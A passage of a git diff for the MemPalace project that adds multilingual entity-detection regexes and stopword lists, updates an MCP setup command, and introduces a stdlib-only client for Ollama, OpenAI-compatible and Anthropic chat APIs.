+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "der", "die", "das", "ein", "eine", "eines", "einer", "einem", "einen",
+      "den", "dem", "des", "und", "oder", "aber", "denn", "weil", "wenn", "als",
+      "ob", "auch", "noch", "schon", "sehr", "viel", "nur", "nicht", "mehr",
+      "kann", "wird", "hat", "ist", "sind", "war", "waren", "sein", "haben",
+      "wurde", "worden", "werden", "mit", "von", "zu", "für", "auf", "in",
+      "an", "um", "über", "nach", "durch", "bei", "aus", "seit", "vor", "zwischen",
+      "ich", "du", "er", "sie", "es", "wir", "ihr", "mich", "dich", "mir", "dir",
+      "uns", "euch", "mein", "dein", "unser", "euer", "ihre", "seine",
+      "wer", "was", "wann", "wo", "wie", "warum", "welcher", "welche", "welches",
+      "so", "dann", "jetzt", "heute", "gestern", "morgen", "hier", "dort", "da",
+      "immer", "nie", "manchmal", "oft", "selten", "bald", "spät",
+      "ja", "nein", "vielleicht", "gut", "schlecht", "besser", "bitte", "danke",
+      "hallo", "hi", "hey", "tschüss",
+      "tag", "tage", "woche", "monat", "jahr", "jahre", "zeit", "welt", "leben",
+      "mensch", "menschen", "leute", "person", "ding", "dinge", "sache", "sachen",
+      "teil", "art", "weise", "stelle", "platz", "ort", "zimmer", "haus", "land",
+      "grund", "frage", "antwort", "fakt", "sinn", "idee", "punkt", "fall", "aspekt",
+      "beispiel", "version", "nummer", "zahl", "name", "namen", "system", "modell",
+      "sprache", "technologie", "gesellschaft", "kultur", "geschichte",
+      "wissenschaft", "zukunft", "erinnerung", "gedächtnis",
+      "datei", "ordner", "pfad", "schlüssel", "wert", "fehler", "warnung",
+      "ergebnis", "eingabe", "ausgabe", "quelle", "ziel", "daten", "elemente",
+      "montag", "dienstag", "mittwoch", "donnerstag", "freitag", "samstag", "sonntag",
+      "januar", "februar", "märz", "april", "mai", "juni", "juli", "august",
+      "september", "oktober", "november", "dezember"
+    ]
   }
 }
diff --git a/mempalace/i18n/en.json b/mempalace/i18n/en.json
index 6a9dff925..39d9ac140 100644
--- a/mempalace/i18n/en.json
+++ b/mempalace/i18n/en.json
@@ -42,7 +42,7 @@
     "action_pattern": "(?:built|fixed|wrote|added|pushed|measured|tested|reviewed|created|deleted|updated|configured|deployed|migrated)\\s+[\\w\\s]{3,30}"
   },
   "entity": {
-    "candidate_pattern": "[A-Z][a-z]{1,19}",
+    "candidate_pattern": "[A-Z][a-z]+(?:[A-Z][a-z]+|[A-Z]{2,})+|[A-Z][a-z]{1,19}",
     "multi_word_pattern": "[A-Z][a-z]+(?:\\s+[A-Z][a-z]+)+",
     "person_verb_patterns": [
       "\\b{name}\\s+said\\b",
@@ -140,7 +140,17 @@
       "agents", "tools", "others", "guards", "ethics", "regulation",
       "learning", "thinking", "memory", "language", "intelligence",
       "technology", "society", "culture", "future", "history", "science",
-      "model", "models", "network", "networks", "training", "inference"
+      "model", "models", "network", "networks", "training", "inference",
+      "created", "updated", "deleted", "added", "removed", "modified",
+      "extracted", "processed", "generated", "compiled", "launched", "installed",
+      "deployed", "executed", "loaded", "parsed", "validated", "configured",
+      "total", "summary", "covered", "included", "pending", "failed", "success",
+      "ready", "active", "disabled", "enabled", "available", "completed",
+      "auto", "multi", "mini", "micro", "meta", "super", "hybrid",
+      "context", "bridge", "batch", "local", "global", "native", "cloud",
+      "before", "after", "during", "often", "always", "never",
+      "project", "contributor", "software",
+      "backend", "frontend", "server", "client", "service", "app", "api"
     ]
   }
 }
diff --git a/mempalace/i18n/es.json b/mempalace/i18n/es.json
index aa30e1bcb..dd490aab9 100644
--- a/mempalace/i18n/es.json
+++ b/mempalace/i18n/es.json
@@ -40,5 +40,89 @@
     "stop_words": "el la los las un una unos unas de del al en con por para su sus mi mis tu tus es son está están fue ser estar haber sido como pero más muy también todo todos toda todas este esta estos estas ese esa esos esas que quien cual donde cuando porque aunque sin",
     "quote_pattern": "\"([^\"]{10,200})\"|«([^»]{10,200})»",
     "action_pattern": "(?:construido|corregido|escrito|añadido|enviado|medido|probado|revisado|creado|eliminado|actualizado|configurado|desplegado|migrado)\\s+[\\wá-ú\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[A-ZÁÉÍÓÚÑÜ][a-záéíóúñü]{1,19}",
+    "multi_word_pattern": "[A-ZÁÉÍÓÚÑÜ][a-záéíóúñü]+(?:\\s+[A-ZÁÉÍÓÚÑÜ][a-záéíóúñü]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+dijo\\b",
+      "\\b{name}\\s+preguntó\\b",
+      "\\b{name}\\s+respondió\\b",
+      "\\b{name}\\s+contó\\b",
+      "\\b{name}\\s+rió\\b",
+      "\\b{name}\\s+sonrió\\b",
+      "\\b{name}\\s+lloró\\b",
+      "\\b{name}\\s+sintió\\b",
+      "\\b{name}\\s+piensa\\b",
+      "\\b{name}\\s+quiere\\b",
+      "\\b{name}\\s+ama\\b",
+      "\\b{name}\\s+odia\\b",
+      "\\b{name}\\s+sabe\\b",
+      "\\b{name}\\s+decidió\\b",
+      "\\b{name}\\s+escribió\\b"
+    ],
+    "pronoun_patterns": [
+      "\\bél\\b",
+      "\\bella\\b",
+      "\\bellos\\b",
+      "\\bellas\\b",
+      "\\blo\\b",
+      "\\bla\\b",
+      "\\ble\\b",
+      "\\bles\\b",
+      "\\bse\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+dijo"
+    ],
+    "direct_address_pattern": "\\bhola\\s+{name}\\b|\\bhey\\s+{name}\\b|\\bhi\\s+{name}\\b|\\bgracias\\s+{name}\\b|\\bquerido\\s+{name}\\b|\\bquerida\\s+{name}\\b|\\bestimado\\s+{name}\\b|\\bestimada\\s+{name}\\b|\\bdon\\s+{name}\\b|\\bdoña\\s+{name}\\b|\\bseñor\\s+{name}\\b|\\bseñora\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bconstruyo\\s+{name}\\b",
+      "\\bconstruí\\s+{name}\\b",
+      "\\barmé\\s+{name}\\b",
+      "\\blancé\\s+{name}\\b",
+      "\\bdesplegué\\s+{name}\\b",
+      "\\binstalé\\s+{name}\\b",
+      "\\bla\\s+arquitectura\\s+{name}\\b",
+      "\\bel\\s+pipeline\\s+{name}\\b",
+      "\\bel\\s+sistema\\s+{name}\\b",
+      "\\bel\\s+proyecto\\s+{name}\\b",
+      "\\bel\\s+repositorio\\s+{name}\\b",
+      "\\b{name}\\s+v\\d+\\b",
+      "\\b{name}\\.py\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "el", "la", "los", "las", "un", "una", "unos", "unas",
+      "de", "del", "al", "a", "en", "con", "sin", "por", "para", "sobre",
+      "entre", "hasta", "desde", "hacia", "contra", "según", "tras",
+      "y", "o", "u", "ni", "pero", "sino", "aunque", "porque", "pues",
+      "que", "quien", "quienes", "cual", "cuales", "cuyo", "cuya",
+      "donde", "cuando", "como", "cuanto", "cuanta",
+      "yo", "tú", "él", "ella", "nosotros", "vosotros", "ellos", "ellas",
+      "me", "te", "se", "nos", "os", "lo", "la", "le", "los", "las", "les",
+      "mi", "mis", "tu", "tus", "su", "sus", "nuestro", "nuestra", "vuestro",
+      "este", "esta", "estos", "estas", "ese", "esa", "esos", "esas",
+      "aquel", "aquella", "aquellos", "aquellas", "esto", "eso", "aquello",
+      "ser", "estar", "haber", "tener", "hacer", "poder", "querer", "saber",
+      "es", "son", "fue", "fueron", "era", "eran", "está", "están", "estaba",
+      "he", "ha", "hemos", "han", "había", "hay",
+      "muy", "mucho", "mucha", "muchos", "muchas", "poco", "poca", "pocos", "pocas",
+      "más", "menos", "tan", "tanto", "también", "tampoco",
+      "sí", "no", "quizás", "tal", "vez",
+      "aquí", "allí", "allá", "ahí", "acá",
+      "hoy", "ayer", "mañana", "ahora", "antes", "después", "luego", "entonces",
+      "siempre", "nunca", "jamás", "todavía", "aún", "ya",
+      "bien", "mal", "mejor", "peor", "bueno", "buena", "malo", "mala",
+      "gracias", "hola", "adiós", "por favor", "perdón",
+      "día", "días", "semana", "mes", "año", "años", "tiempo", "vez", "veces",
+      "cosa", "cosas", "persona", "gente", "mundo", "vida", "casa", "lugar",
+      "forma", "manera", "parte", "caso", "punto", "idea", "hecho", "razón",
+      "nombre", "número", "versión", "sistema", "modelo"
+    ]
   }
 }
diff --git a/mempalace/i18n/fr.json b/mempalace/i18n/fr.json
index 2e3d0b9e3..86df08c72 100644
--- a/mempalace/i18n/fr.json
+++ b/mempalace/i18n/fr.json
@@ -40,5 +40,87 @@
     "stop_words": "le la les un une des de du au aux en et ou mais donc or ni car que qui ce cette ces son sa ses mon ma mes ton ta tes leur leurs nous vous ils elles on ne pas plus très bien aussi avec pour dans sur par est sont fait être avoir été comme tout tous toute toutes",
     "quote_pattern": "«\\s*([^»]{10,200})\\s*»|\"([^\"]{10,200})\"",
     "action_pattern": "(?:construit|corrigé|écrit|ajouté|poussé|mesuré|testé|révisé|créé|supprimé|mis à jour|configuré|déployé|migré)\\s+[\\wà-ÿ\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[A-ZÀÂÄÇÉÈÊËÎÏÔÖÙÛÜŸÆŒ][a-zàâäçéèêëîïôöùûüÿæœ]{1,19}",
+    "multi_word_pattern": "[A-ZÀÂÄÇÉÈÊËÎÏÔÖÙÛÜŸÆŒ][a-zàâäçéèêëîïôöùûüÿæœ]+(?:\\s+[A-ZÀÂÄÇÉÈÊËÎÏÔÖÙÛÜŸÆŒ][a-zàâäçéèêëîïôöùûüÿæœ]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+a\\s+dit\\b",
+      "\\b{name}\\s+a\\s+demandé\\b",
+      "\\b{name}\\s+a\\s+répondu\\b",
+      "\\b{name}\\s+a\\s+raconté\\b",
+      "\\b{name}\\s+a\\s+ri\\b",
+      "\\b{name}\\s+a\\s+souri\\b",
+      "\\b{name}\\s+a\\s+pleuré\\b",
+      "\\b{name}\\s+a\\s+senti\\b",
+      "\\b{name}\\s+pense\\b",
+      "\\b{name}\\s+veut\\b",
+      "\\b{name}\\s+aime\\b",
+      "\\b{name}\\s+déteste\\b",
+      "\\b{name}\\s+sait\\b",
+      "\\b{name}\\s+a\\s+décidé\\b",
+      "\\b{name}\\s+a\\s+écrit\\b"
+    ],
+    "pronoun_patterns": [
+      "\\bil\\b",
+      "\\belle\\b",
+      "\\blui\\b",
+      "\\bils\\b",
+      "\\belles\\b",
+      "\\bleur\\b",
+      "\\bleurs\\b",
+      "\\beux\\b",
+      "\\bse\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+a\\s+dit"
+    ],
+    "direct_address_pattern": "\\bbonjour\\s+{name}\\b|\\bsalut\\s+{name}\\b|\\bmerci\\s+{name}\\b|\\bcher\\s+{name}\\b|\\bchère\\s+{name}\\b|\\bmonsieur\\s+{name}\\b|\\bmadame\\s+{name}\\b|\\bhey\\s+{name}\\b|\\bhi\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bconstruit\\s+{name}\\b",
+      "\\blancé\\s+{name}\\b",
+      "\\bdéployé\\s+{name}\\b",
+      "\\binstallé\\s+{name}\\b",
+      "\\bl'architecture\\s+{name}\\b",
+      "\\ble\\s+pipeline\\s+{name}\\b",
+      "\\ble\\s+système\\s+{name}\\b",
+      "\\ble\\s+projet\\s+{name}\\b",
+      "\\ble\\s+dépôt\\s+{name}\\b",
+      "\\b{name}\\s+v\\d+\\b",
+      "\\b{name}\\.py\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "le", "la", "les", "un", "une", "des", "du", "de", "au", "aux",
+      "en", "dans", "sur", "sous", "avec", "sans", "pour", "par", "vers",
+      "chez", "entre", "depuis", "pendant", "avant", "après", "jusqu",
+      "et", "ou", "mais", "donc", "or", "ni", "car", "que", "qui",
+      "dont", "où", "quand", "comment", "pourquoi", "combien", "lequel",
+      "ce", "cet", "cette", "ces", "celui", "celle", "ceux", "celles",
+      "mon", "ma", "mes", "ton", "ta", "tes", "son", "sa", "ses",
+      "notre", "nos", "votre", "vos", "leur", "leurs",
+      "je", "tu", "il", "elle", "on", "nous", "vous", "ils", "elles",
+      "me", "te", "se", "lui", "eux",
+      "être", "avoir", "faire", "dire", "aller", "voir", "savoir", "pouvoir",
+      "est", "sont", "était", "étaient", "fut", "furent", "sera", "seront",
+      "ai", "as", "a", "avons", "avez", "ont", "avait", "avaient",
+      "très", "bien", "mal", "peu", "beaucoup", "trop", "assez", "aussi",
+      "plus", "moins", "tant", "si", "tellement",
+      "oui", "non", "peut-être", "vraiment",
+      "ici", "là", "là-bas", "partout", "ailleurs",
+      "aujourd'hui", "hier", "demain", "maintenant", "alors", "ensuite",
+      "toujours", "jamais", "souvent", "parfois", "déjà", "encore",
+      "bon", "bonne", "mauvais", "mauvaise", "meilleur", "pire",
+      "merci", "bonjour", "salut", "au revoir",
+      "jour", "jours", "semaine", "mois", "année", "temps", "fois",
+      "chose", "choses", "personne", "gens", "monde", "vie", "maison",
+      "endroit", "lieu", "partie", "façon", "manière", "sorte", "type",
+      "cas", "point", "idée", "fait", "raison", "nom", "nombre",
+      "version", "système", "modèle", "question", "réponse"
+    ]
   }
 }
diff --git a/mempalace/i18n/zh-CN.json b/mempalace/i18n/zh-CN.json
index 4e41a5714..7a708cf0a 100644
--- a/mempalace/i18n/zh-CN.json
+++ b/mempalace/i18n/zh-CN.json
@@ -40,5 +40,93 @@
     "stop_words": "的 了 在 是 我 有 和 就 不 人 都 一 一个 上 也 很 到 说 要 去 你 会 着 没有 看 好 自己 这 那 她 他 它 们 但是 因为 所以 如果 虽然 然后 或者 而且",
     "quote_pattern": "\\u201C([^\\u201D]{10,100})\\u201D|\"([^\"]{10,200})\"",
     "action_pattern": "(构建|修复|添加|删除|确认|创建|实现|修理|编写|测试|验证|更新|配置|启动|停止)(?:了|完成|成功)"
+  },
+  "entity": {
+    "boundary_chars": "\\u4E00-\\u9FFF",
+    "candidate_pattern": "[王李张刘陈杨赵黄周吴徐孙朱胡郭何高林罗郑梁谢宋唐许韩冯邓曹彭曾萧田董袁潘于蒋蔡余杜叶程苏魏吕丁任沈姚卢姜崔钟谭陆汪范金石廖贾夏韦方白邹孟熊秦邱江尹薛阎段雷侯龙史陶黎贺顾毛郝龚邵万钱严武戴莫孔向汤温庞殷章葛管甘卞冉蓝殷习][\\u4E00-\\u9FFF]{1,2}",
+    "person_verb_patterns": [
+      "{name}说",
+      "{name}问",
+      "{name}答",
+      "{name}表示",
+      "{name}回答",
+      "{name}提出",
+      "{name}决定",
+      "{name}认为",
+      "{name}指出",
+      "{name}解释",
+      "{name}告诉",
+      "{name}写道",
+      "{name}想",
+      "{name}觉得",
+      "{name}知道",
+      "{name}喜欢",
+      "{name}讨厌",
+      "{name}确认",
+      "{name}提醒",
+      "{name}分享",
+      "{name}建议",
+      "{name}同意",
+      "{name}反对"
+    ],
+    "pronoun_patterns": [
+      "他们",
+      "她们",
+      "他",
+      "她",
+      "它",
+      "您",
+      "咱"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:：\\s]",
+      "^{name}[:：]\\s?",
+      "^\\[{name}\\]",
+      "\u201C{name}[\u201D:：]",
+      "「{name}[」:：]"
+    ],
+    "direct_address_pattern": "嘿\\s*{name}|喂\\s*{name}|谢谢\\s*{name}|感谢\\s*{name}|哈喽\\s*{name}|亲爱的\\s*{name}",
+    "project_verb_patterns": [
+      "建立{name}",
+      "打造{name}",
+      "部署{name}",
+      "启动{name}",
+      "发布{name}",
+      "上线{name}",
+      "开发{name}",
+      "维护{name}",
+      "{name}系统",
+      "{name}平台",
+      "{name}项目",
+      "{name}架构",
+      "{name}管线",
+      "{name}v\\d+",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "的", "了", "着", "过", "得", "地", "吗", "吧", "呢", "啊", "喔", "耶",
+      "我", "你", "妳", "他", "她", "它", "您", "咱",
+      "我们", "你们", "妳们", "他们", "她们", "它们", "咱们",
+      "自己", "大家", "有人", "没人",
+      "今天", "明天", "昨天", "前天", "后天", "今年", "明年", "去年",
+      "早上", "下午", "晚上", "中午", "凌晨",
+      "现在", "刚才", "刚刚", "等等", "等下", "待会",
+      "最近", "以前", "之前", "之后", "以后", "后来",
+      "什么", "为什么", "怎么", "怎样", "哪里", "哪个",
+      "这个", "那个", "这里", "那里", "这些", "那些", "这样", "那样",
+      "但是", "可是", "然后", "所以", "因为", "如果", "虽然",
+      "而且", "或者", "或是", "还是", "不过", "只是", "不只",
+      "既然", "不然", "否则", "此外", "另外",
+      "很", "非常", "相当", "真的", "确实", "当然", "其实",
+      "已经", "正在", "即将", "将要", "刚好", "恰好",
+      "可能", "也许", "或许", "大概", "应该", "必须", "一定",
+      "完成", "执行", "进行", "开始", "结束", "继续", "停止", "完毕",
+      "没有", "有点", "有些", "一些", "许多", "很多",
+      "问题", "答案", "原因", "结果", "情况", "状况",
+      "主要", "重要", "基本", "简单", "复杂", "特别",
+      "谢谢", "感谢", "对不起", "不好意思", "请问",
+      "欢迎", "再见", "你好", "您好", "哈喽", "拜拜"
+    ]
   }
 }
diff --git a/mempalace/i18n/zh-TW.json b/mempalace/i18n/zh-TW.json
index b65552bce..db3f2ad0d 100644
--- a/mempalace/i18n/zh-TW.json
+++ b/mempalace/i18n/zh-TW.json
@@ -40,5 +40,93 @@
     "stop_words": "的 了 在 是 我 有 和 就 不 人 都 一 一個 上 也 很 到 說 要 去 你 會 著 沒有 看 好 自己 這 那 她 他 它 們 但是 因為 所以 如果 雖然 然後 或者 而且",
     "quote_pattern": "「([^」]{10,100})」|\u201c([^\u201d]{10,100})\u201d",
     "action_pattern": "(構建|修復|添加|刪除|確認|創建|實現|修理|編寫|測試|驗證|更新|配置|啟動|停止)(?:了|完成|成功)"
+  },
+  "entity": {
+    "boundary_chars": "\\u4E00-\\u9FFF",
+    "candidate_pattern": "[王李張劉陳楊趙黃周吳徐孫朱胡郭何高林羅鄭梁謝宋唐許韓馮鄧曹彭曾蕭田董袁潘于蔣蔡余杜葉程蘇魏呂丁任沈姚盧姜崔鍾譚陸汪范金石廖賈夏韋方白鄒孟熊秦邱江尹薛閻段雷侯龍史陶黎賀顧毛郝龔邵萬錢嚴武戴莫孔向湯溫龐殷章葛管甘卞冉藍殷習][\\u4E00-\\u9FFF]{1,2}",
+    "person_verb_patterns": [
+      "{name}說",
+      "{name}問",
+      "{name}答",
+      "{name}表示",
+      "{name}回答",
+      "{name}提出",
+      "{name}決定",
+      "{name}認為",
+      "{name}指出",
+      "{name}解釋",
+      "{name}告訴",
+      "{name}寫道",
+      "{name}想",
+      "{name}覺得",
+      "{name}知道",
+      "{name}喜歡",
+      "{name}討厭",
+      "{name}確認",
+      "{name}提醒",
+      "{name}分享",
+      "{name}建議",
+      "{name}同意",
+      "{name}反對"
+    ],
+    "pronoun_patterns": [
+      "他們",
+      "她們",
+      "他",
+      "她",
+      "它",
+      "您",
+      "咱"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:：\\s]",
+      "^{name}[:：]\\s?",
+      "^\\[{name}\\]",
+      "「{name}[」:：]",
+      "『{name}[』:：]"
+    ],
+    "direct_address_pattern": "嘿\\s*{name}|喂\\s*{name}|謝謝\\s*{name}|感謝\\s*{name}|哈囉\\s*{name}|親愛的\\s*{name}",
+    "project_verb_patterns": [
+      "建立{name}",
+      "打造{name}",
+      "部署{name}",
+      "啟動{name}",
+      "發布{name}",
+      "上線{name}",
+      "開發{name}",
+      "維護{name}",
+      "{name}系統",
+      "{name}平台",
+      "{name}專案",
+      "{name}架構",
+      "{name}管線",
+      "{name}v\\d+",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "的", "了", "著", "過", "得", "地", "嗎", "吧", "呢", "啊", "喔", "耶",
+      "我", "你", "妳", "他", "她", "它", "您", "咱",
+      "我們", "你們", "妳們", "他們", "她們", "它們", "咱們",
+      "自己", "大家", "有人", "沒人",
+      "今天", "明天", "昨天", "前天", "後天", "今年", "明年", "去年",
+      "早上", "下午", "晚上", "中午", "凌晨",
+      "現在", "剛才", "剛剛", "等等", "等下", "待會",
+      "最近", "以前", "之前", "之後", "以後", "後來",
+      "什麼", "甚麼", "為什麼", "怎麼", "怎樣", "哪裡", "哪個",
+      "這個", "那個", "這裡", "那裡", "這些", "那些", "這樣", "那樣",
+      "但是", "可是", "然後", "所以", "因為", "如果", "雖然",
+      "而且", "或者", "或是", "還是", "不過", "只是", "不只",
+      "既然", "不然", "否則", "此外", "另外",
+      "很", "非常", "相當", "真的", "確實", "當然", "其實",
+      "已經", "正在", "即將", "將要", "剛好", "恰好",
+      "可能", "也許", "或許", "大概", "應該", "必須", "一定",
+      "完成", "執行", "進行", "開始", "結束", "繼續", "停止", "完畢",
+      "沒有", "有點", "有些", "一些", "許多", "很多",
+      "問題", "答案", "原因", "結果", "情況", "狀況",
+      "主要", "重要", "基本", "簡單", "複雜", "特別",
+      "謝謝", "感謝", "對不起", "不好意思", "請問",
+      "歡迎", "再見", "你好", "您好", "哈囉", "掰掰"
+    ]
   }
 }
diff --git a/mempalace/instructions/init.md b/mempalace/instructions/init.md
index 40f0c20dd..570a52541 100644
--- a/mempalace/instructions/init.md
+++ b/mempalace/instructions/init.md
@@ -49,7 +49,7 @@ If this fails, report the error and stop.
 
 Run the following command to register the MemPalace MCP server with Claude:
 
-    claude mcp add mempalace -- python -m mempalace.mcp_server
+    claude mcp add mempalace -- mempalace-mcp
 
 If this fails, report the error but continue to the next step (MCP
 configuration can be done manually later).
diff --git a/mempalace/llm_client.py b/mempalace/llm_client.py
new file mode 100644
index 000000000..74982cea1
--- /dev/null
+++ b/mempalace/llm_client.py
@@ -0,0 +1,305 @@
+"""
+llm_client.py — Minimal provider abstraction for LLM-assisted entity refinement.
+
+Three providers cover the useful space:
+
+- ``ollama`` (default): local models via http://localhost:11434. Works fully
+  offline. Honors MemPalace's "zero-API required" principle.
+- ``openai-compat``: any OpenAI-compatible ``/v1/chat/completions`` endpoint.
+  Covers OpenRouter, LM Studio, llama.cpp server, vLLM, Groq, Fireworks,
+  Together, and most self-hosted setups.
+- ``anthropic``: the official Messages API. Opt-in for users who want Haiku
+  quality without setting up a local model.
+
+All providers expose the same ``classify(system, user, json_mode)`` method and
+the same ``check_available()`` probe. No external SDK dependencies — stdlib
+``urllib`` only.
+
+JSON mode matters here: we always ask for structured output. Providers
+differ on how to request it (Ollama: ``format: json``; OpenAI-compat:
+``response_format``; Anthropic: prompt-level instruction) and this module
+normalizes that away from the caller.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+from dataclasses import dataclass
+from typing import Optional
+from urllib.error import HTTPError, URLError
+from urllib.request import Request, urlopen
+
+
+class LLMError(RuntimeError):
+    """Raised for any provider failure — transport, parse, auth, missing model."""
+
+
+@dataclass
+class LLMResponse:
+    text: str
+    model: str
+    provider: str
+    raw: dict
+
+
+# ==================== BASE ====================
+
+
+class LLMProvider:
+    name: str = "base"
+
+    def __init__(
+        self,
+        model: str,
+        endpoint: Optional[str] = None,
+        api_key: Optional[str] = None,
+        timeout: int = 120,
+    ):
+        self.model = model
+        self.endpoint = endpoint
+        self.api_key = api_key
+        self.timeout = timeout
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        raise NotImplementedError
+
+    def check_available(self) -> tuple[bool, str]:
+        """Return ``(ok, message)``. Fast probe that the provider is reachable."""
+        raise NotImplementedError
+
+
+def _http_post_json(url: str, body: dict, headers: dict, timeout: int) -> dict:
+    """POST JSON and return the parsed response. Raises LLMError on any failure."""
+    req = Request(
+        url,
+        data=json.dumps(body).encode("utf-8"),
+        headers={"Content-Type": "application/json", **headers},
+    )
+    try:
+        with urlopen(req, timeout=timeout) as resp:
+            return json.loads(resp.read())
+    except HTTPError as e:
+        detail = ""
+        try:
+            detail = e.read().decode("utf-8", errors="replace")[:500]
+        except Exception:
+            pass
+        raise LLMError(f"HTTP {e.code} from {url}: {detail or e.reason}") from e
+    except (URLError, OSError) as e:
+        raise LLMError(f"Cannot reach {url}: {e}") from e
+    except json.JSONDecodeError as e:
+        raise LLMError(f"Malformed response from {url}: {e}") from e
+
+
+# ==================== OLLAMA ====================
+
+
+class OllamaProvider(LLMProvider):
+    name = "ollama"
+    DEFAULT_ENDPOINT = "http://localhost:11434"
+
+    def __init__(
+        self,
+        model: str,
+        endpoint: Optional[str] = None,
+        timeout: int = 180,
+        **_: object,
+    ):
+        super().__init__(
+            model=model,
+            endpoint=endpoint or self.DEFAULT_ENDPOINT,
+            timeout=timeout,
+        )
+
+    def check_available(self) -> tuple[bool, str]:
+        try:
+            with urlopen(f"{self.endpoint}/api/tags", timeout=5) as resp:
+                data = json.loads(resp.read())
+        except (URLError, HTTPError, OSError, json.JSONDecodeError) as e:
+            return False, f"Cannot reach Ollama at {self.endpoint}: {e}"
+        names = {m.get("name", "") for m in data.get("models", []) or []}
+        # Ollama tags may or may not include ':latest' — accept either form
+        wanted = {self.model, f"{self.model}:latest"}
+        if not names & wanted:
+            return (
+                False,
+                f"Model '{self.model}' not loaded in Ollama. Run: ollama pull {self.model}",
+            )
+        return True, "ok"
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        body: dict = {
+            "model": self.model,
+            "messages": [
+                {"role": "system", "content": system},
+                {"role": "user", "content": user},
+            ],
+            "stream": False,
+            "options": {"temperature": 0.1},
+        }
+        if json_mode:
+            body["format"] = "json"
+        data = _http_post_json(f"{self.endpoint}/api/chat", body, headers={}, timeout=self.timeout)
+        text = (data.get("message") or {}).get("content", "")
+        if not text:
+            raise LLMError(f"Empty response from Ollama (model={self.model})")
+        return LLMResponse(text=text, model=self.model, provider=self.name, raw=data)
+
+
+# ==================== OPENAI-COMPAT ====================
+
+
+class OpenAICompatProvider(LLMProvider):
+    """Any OpenAI-compatible ``/v1/chat/completions`` endpoint.
+
+    Supply ``--llm-endpoint http://host:port`` (with or without ``/v1``).
+    API key via ``--llm-api-key`` or the ``OPENAI_API_KEY`` env var.
+    """
+
+    name = "openai-compat"
+
+    def __init__(
+        self,
+        model: str,
+        endpoint: Optional[str] = None,
+        api_key: Optional[str] = None,
+        timeout: int = 120,
+        **_: object,
+    ):
+        resolved_key = api_key or os.environ.get("OPENAI_API_KEY")
+        super().__init__(model=model, endpoint=endpoint, api_key=resolved_key, timeout=timeout)
+
+    def _resolve_url(self) -> str:
+        if not self.endpoint:
+            raise LLMError("openai-compat provider requires --llm-endpoint")
+        url = self.endpoint.rstrip("/")
+        if url.endswith("/chat/completions"):
+            return url
+        if not url.endswith("/v1"):
+            url = f"{url}/v1"
+        return f"{url}/chat/completions"
+
+    def check_available(self) -> tuple[bool, str]:
+        if not self.endpoint:
+            return False, "no --llm-endpoint configured"
+        base = self.endpoint.rstrip("/")
+        base = base.removesuffix("/chat/completions").removesuffix("/v1")
+        try:
+            req = Request(f"{base}/v1/models")
+            if self.api_key:
+                req.add_header("Authorization", f"Bearer {self.api_key}")
+            with urlopen(req, timeout=5):
+                pass
+        except (URLError, HTTPError, OSError) as e:
+            return False, f"Cannot reach {self.endpoint}: {e}"
+        return True, "ok"
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        body: dict = {
+            "model": self.model,
+            "messages": [
+                {"role": "system", "content": system},
+                {"role": "user", "content": user},
+            ],
+            "temperature": 0.1,
+        }
+        if json_mode:
+            body["response_format"] = {"type": "json_object"}
+        headers = {}
+        if self.api_key:
+            headers["Authorization"] = f"Bearer {self.api_key}"
+        data = _http_post_json(self._resolve_url(), body, headers=headers, timeout=self.timeout)
+        try:
+            text = data["choices"][0]["message"]["content"]
+        except (KeyError, IndexError, TypeError) as e:
+            raise LLMError(f"Unexpected response shape: {e}") from e
+        if not text:
+            raise LLMError(f"Empty response from {self.name} (model={self.model})")
+        return LLMResponse(text=text, model=self.model, provider=self.name, raw=data)
+
+
+# ==================== ANTHROPIC ====================
+
+
+class AnthropicProvider(LLMProvider):
+    name = "anthropic"
+    DEFAULT_ENDPOINT = "https://api.anthropic.com"
+    API_VERSION = "2023-06-01"
+
+    def __init__(
+        self,
+        model: str,
+        api_key: Optional[str] = None,
+        endpoint: Optional[str] = None,
+        timeout: int = 120,
+        **_: object,
+    ):
+        key = api_key or os.environ.get("ANTHROPIC_API_KEY")
+        super().__init__(
+            model=model,
+            endpoint=endpoint or self.DEFAULT_ENDPOINT,
+            api_key=key,
+            timeout=timeout,
+        )
+
+    def check_available(self) -> tuple[bool, str]:
+        if not self.api_key:
+            return False, "ANTHROPIC_API_KEY not set (use --llm-api-key or env)"
+        # Don't probe — a live request would cost money. First real call will
+        # surface auth errors if the key is invalid.
+        return True, "ok"
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        if not self.api_key:
+            raise LLMError("Anthropic provider requires ANTHROPIC_API_KEY env or --llm-api-key")
+        sys_prompt = system
+        if json_mode:
+            sys_prompt += "\n\nRespond with valid JSON only, no prose."
+        body = {
+            "model": self.model,
+            "max_tokens": 2048,
+            "temperature": 0.1,
+            "system": sys_prompt,
+            "messages": [{"role": "user", "content": user}],
+        }
+        headers = {
+            "X-API-Key": self.api_key,
+            "anthropic-version": self.API_VERSION,
+        }
+        data = _http_post_json(
